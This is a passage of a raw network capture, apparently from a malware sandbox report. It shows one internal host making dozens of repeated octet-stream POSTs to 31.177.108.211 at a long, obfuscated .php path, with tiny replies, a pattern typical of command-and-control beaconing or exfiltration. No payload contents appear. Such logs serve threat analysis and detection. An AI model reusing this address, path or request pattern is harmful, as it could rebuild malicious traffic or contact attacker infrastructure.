                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2108
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:04:13.066958904 CEST | 2108 | OUT
                                          Sep 13, 2024 21:04:13.454747915 CEST | 25 | IN | HTTP/1.1 100 Continue
                                          Sep 13, 2024 21:04:13.610995054 CEST | 349 | IN | HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:04:13 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port
                                          105 | 192.168.2.4 | 56775 | 31.177.108.211 | 80
                                          Timestamp | Bytes transferred | Direction | Data
                                          Sep 13, 2024 21:04:12.839139938 CEST | 578 | OUT | POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:04:13.191783905 CEST | 2532 | OUT
                                          Sep 13, 2024 21:04:13.610439062 CEST | 25 | IN | HTTP/1.1 100 Continue
                                          Sep 13, 2024 21:04:13.748809099 CEST | 200 | IN | HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:04:13 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port
                                          106 | 192.168.2.4 | 56776 | 31.177.108.211 | 80
                                          Timestamp | Bytes transferred | Direction | Data
                                          Sep 13, 2024 21:04:13.879827023 CEST | 554 | OUT | POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Sep 13, 2024 21:04:14.238812923 CEST | 2532 | OUT
                                          Sep 13, 2024 21:04:14.622409105 CEST | 25 | IN | HTTP/1.1 100 Continue
                                          Sep 13, 2024 21:04:14.760302067 CEST | 200 | IN | HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:04:14 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port
                                          107 | 192.168.2.4 | 56777 | 31.177.108.211 | 80
                                          Timestamp | Bytes transferred | Direction | Data
                                          Sep 13, 2024 21:04:14.881805897 CEST | 578 | OUT | POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:04:15.239337921 CEST | 2532 | OUT | Data (request body)
                                          Sep 13, 2024 21:04:15.644181013 CEST | 25 | IN | HTTP/1.1 100 Continue
                                          Sep 13, 2024 21:04:15.802208900 CEST | 200 | IN | HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:04:15 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port
                                          108 | 192.168.2.4 | 56778 | 31.177.108.211 | 80
                                          Timestamp | Bytes transferred | Direction | Data
                                          Sep 13, 2024 21:04:15.929012060 CEST | 578 | OUT | POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:04:16.285607100 CEST | 2532 | OUT | Data (request body)
                                          Sep 13, 2024 21:04:16.682226896 CEST | 25 | IN | HTTP/1.1 100 Continue
                                          Sep 13, 2024 21:04:16.817600965 CEST | 200 | IN | HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:04:16 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port
                                          109 | 192.168.2.4 | 56779 | 31.177.108.211 | 80
                                          Timestamp | Bytes transferred | Direction | Data
                                          Sep 13, 2024 21:04:16.943732023 CEST | 578 | OUT | POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:04:17.301211119 CEST | 2532 | OUT | Data (request body)
                                          Sep 13, 2024 21:04:17.711360931 CEST | 25 | IN | HTTP/1.1 100 Continue
                                          Sep 13, 2024 21:04:17.864907026 CEST | 200 | IN | HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:04:17 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port
                                          110 | 192.168.2.4 | 56780 | 31.177.108.211 | 80
                                          Timestamp | Bytes transferred | Direction | Data
                                          Sep 13, 2024 21:04:18.020239115 CEST | 578 | OUT | POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:04:18.379332066 CEST | 2532 | OUT | Data (request body)


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port
                                          111 | 192.168.2.4 | 56781 | 31.177.108.211 | 80
                                          Timestamp | Bytes transferred | Direction | Data
                                          Sep 13, 2024 21:04:18.619504929 CEST | 578 | OUT | POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2108
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:04:18.973134995 CEST | 2108 | OUT | Data (request body)
                                          Sep 13, 2024 21:04:19.414566994 CEST | 25 | IN | HTTP/1.1 100 Continue
                                          Sep 13, 2024 21:04:19.549065113 CEST | 349 | IN | HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:04:19 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port
                                          112 | 192.168.2.4 | 56782 | 31.177.108.211 | 80
                                          Timestamp | Bytes transferred | Direction | Data
                                          Sep 13, 2024 21:04:18.742201090 CEST | 578 | OUT | POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:04:19.098284960 CEST | 2532 | OUT | Data (request body)
                                          Sep 13, 2024 21:04:19.537015915 CEST | 25 | IN | HTTP/1.1 100 Continue
                                          Sep 13, 2024 21:04:19.690294027 CEST | 200 | IN | HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:04:19 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port
                                          113 | 192.168.2.4 | 56783 | 31.177.108.211 | 80
                                          Timestamp | Bytes transferred | Direction | Data
                                          Sep 13, 2024 21:04:19.817940950 CEST | 554 | OUT | POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Sep 13, 2024 21:04:20.176260948 CEST | 2532 | OUT | Data (request body)
                                          Sep 13, 2024 21:04:20.561043978 CEST | 25 | IN | HTTP/1.1 100 Continue
                                          Sep 13, 2024 21:04:20.691134930 CEST | 200 | IN | HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:04:20 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port
                                          114 | 192.168.2.4 | 56784 | 31.177.108.211 | 80
                                          Timestamp | Bytes transferred | Direction | Data
                                          Sep 13, 2024 21:04:20.819859982 CEST | 578 | OUT | POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:04:21.176335096 CEST | 2532 | OUT | Data (request body)
                                          Sep 13, 2024 21:04:21.557112932 CEST | 25 | IN | HTTP/1.1 100 Continue
                                          Sep 13, 2024 21:04:21.710366964 CEST | 200 | IN | HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:04:21 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port
                                          115 | 192.168.2.4 | 56785 | 31.177.108.211 | 80
                                          Timestamp | Bytes transferred | Direction | Data
                                          Sep 13, 2024 21:04:21.836574078 CEST | 578 | OUT | POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:04:22.191900969 CEST | 2532 | OUT | Data (request body)
                                          Sep 13, 2024 21:04:22.600115061 CEST | 25 | IN | HTTP/1.1 100 Continue
                                          Sep 13, 2024 21:04:22.861603975 CEST | 200 | IN | HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:04:22 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0
                                          Sep 13, 2024 21:04:22.861623049 CEST | 200 | IN | HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:04:22 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port
                                          116 | 192.168.2.4 | 56786 | 31.177.108.211 | 80
                                          Timestamp | Bytes transferred | Direction | Data
                                          Sep 13, 2024 21:04:22.990046978 CEST | 578 | OUT | POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:04:23.348078012 CEST | 2532 | OUT | Data (request body)
                                          Sep 13, 2024 21:04:23.750345945 CEST | 25 | IN | HTTP/1.1 100 Continue
                                          Sep 13, 2024 21:04:23.885545015 CEST | 200 | IN | HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:04:23 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port
                                          117 | 192.168.2.4 | 56787 | 31.177.108.211 | 80
                                          Timestamp | Bytes transferred | Direction | Data
                                          Sep 13, 2024 21:04:24.004740953 CEST | 578 | OUT | POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2528
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:04:24.363862991 CEST | 2528 | OUT | Data (request body)


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port
                                          118 | 192.168.2.4 | 56788 | 31.177.108.211 | 80
                                          Timestamp | Bytes transferred | Direction | Data
                                          Sep 13, 2024 21:04:24.557202101 CEST | 578 | OUT | POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2108
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:04:24.910756111 CEST | 2108 | OUT | Data (request body)
                                          Sep 13, 2024 21:04:25.321690083 CEST | 25 | IN | HTTP/1.1 100 Continue
                                          Sep 13, 2024 21:04:25.468986988 CEST | 349 | IN | HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:04:25 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port
                                          119 | 192.168.2.4 | 56789 | 31.177.108.211 | 80
                                          Timestamp | Bytes transferred | Direction | Data
                                          Sep 13, 2024 21:04:24.679548979 CEST | 578 | OUT | POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:04:25.425667048 CEST | 25 | IN | HTTP/1.1 100 Continue
                                          Sep 13, 2024 21:04:25.589925051 CEST | 200 | IN | HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:04:25 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port
                                          120 | 192.168.2.4 | 56790 | 31.177.108.211 | 80
                                          Timestamp | Bytes transferred | Direction | Data
                                          Sep 13, 2024 21:04:25.708940029 CEST | 554 | OUT | POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Sep 13, 2024 21:04:26.473896980 CEST | 25 | IN | HTTP/1.1 100 Continue
                                          Sep 13, 2024 21:04:26.605134010 CEST | 200 | IN | HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:04:26 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port
                                          121 | 192.168.2.4 | 56791 | 31.177.108.211 | 80
                                          Timestamp | Bytes transferred | Direction | Data
                                          Sep 13, 2024 21:04:26.728049040 CEST | 554 | OUT | POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Sep 13, 2024 21:04:27.473531008 CEST | 25 | IN | HTTP/1.1 100 Continue
                                          Sep 13, 2024 21:04:27.604829073 CEST | 200 | IN | HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:04:27 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port
                                          122 | 192.168.2.4 | 56792 | 31.177.108.211 | 80
                                          Timestamp | Bytes transferred | Direction | Data
                                          Sep 13, 2024 21:04:27.727890968 CEST | 578 | OUT | POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:04:28.526871920 CEST | 25 | IN | HTTP/1.1 100 Continue
                                          Sep 13, 2024 21:04:28.688282967 CEST | 200 | IN | HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:04:28 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port
                                          123 | 192.168.2.4 | 56793 | 31.177.108.211 | 80
                                          Timestamp | Bytes transferred | Direction | Data
                                          Sep 13, 2024 21:04:28.820270061 CEST | 578 | OUT | POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:04:29.577256918 CEST | 25 | IN | HTTP/1.1 100 Continue
                                          Sep 13, 2024 21:04:29.712774992 CEST | 200 | IN | HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:04:29 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port
                                          124 | 192.168.2.4 | 56794 | 31.177.108.211 | 80
                                          Timestamp | Bytes transferred | Direction | Data
                                          Sep 13, 2024 21:04:29.833197117 CEST | 578 | OUT | POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Connection: Keep-Alive


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port
                                          125 | 192.168.2.4 | 56795 | 31.177.108.211 | 80
                                          Timestamp | Bytes transferred | Direction | Data
                                          Sep 13, 2024 21:04:30.479604006 CEST | 578 | OUT | POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2108
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:04:31.228379965 CEST | 25 | IN | HTTP/1.1 100 Continue
                                          Sep 13, 2024 21:04:31.358329058 CEST | 349 | IN | HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:04:31 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port
                                          126 | 192.168.2.4 | 56796 | 31.177.108.211 | 80
                                          Timestamp | Bytes transferred | Direction | Data
